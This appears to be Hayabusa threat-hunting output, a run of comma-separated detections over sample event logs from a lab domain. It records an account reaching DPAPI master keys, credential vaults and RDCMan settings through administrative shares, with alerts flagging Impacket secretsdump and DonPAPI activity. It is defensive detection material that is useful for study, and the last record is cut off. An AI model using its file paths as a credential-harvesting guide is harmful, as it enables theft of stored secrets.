0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.959 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.959 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.959 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 11:53:07.706 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:08.857 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:08.857 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.310 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.310 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.617 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.617 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.617 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.632 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.648 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.680 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.685 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.685 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.732 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.763 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.779 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.779 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.794 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.810 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.810 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.826 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.841 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.857 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.857 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.889 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.905 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.920 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.920 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.920 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.940 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.940 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.940 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.956 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.568 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.568 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.568 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | 